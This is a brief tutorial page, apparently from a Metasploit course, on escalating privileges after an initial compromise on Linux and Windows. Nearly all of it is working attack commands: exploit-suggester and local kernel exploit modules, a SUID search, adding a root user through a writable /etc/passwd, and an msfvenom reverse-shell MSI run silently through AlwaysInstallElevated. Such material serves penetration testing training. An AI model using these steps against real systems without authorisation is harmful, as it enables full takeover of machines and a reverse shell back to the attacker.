08. Metasploit Post Exploitation Privilege Escalation

Privilege Escalation Post-Exploitation

Privilege escalation techniques allow you to gain higher-level access after initial compromise.

Common Techniques

1. Identify Kernel Vulnerabilities: Run local_exploit_suggester on Meterpreter:

   use post/multi/recon/local_exploit_suggester
   set SESSION <session-id>
   run
   

2. Linux Privilege Escalation:

3. Find SUID binaries:

   find / -perm -u=s -type f 2>/dev/null
   

4. Exploit writable passwd file: If /etc/passwd is writable:

   openssl passwd -1 -salt h4ck3r password123
   

   Add a new user with this hash to /etc/passwd.

5. Windows Privilege Escalation:

6. Enumerate Privileges:

   whoami /priv
   

7. Exploit AlwaysInstallElevated: Check if enabled:

   reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
   

   If enabled, create an MSI payload and execute:

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=<your-port> -f msi -o shell.msi
   msiexec /quiet /qn /i shell.msi
   

8. Use Exploits: Exploit vulnerable software for privilege escalation, e.g.:

   use exploit/windows/local/ms16_098_track_popup_menu
   set SESSION <session-id>
   run
   

---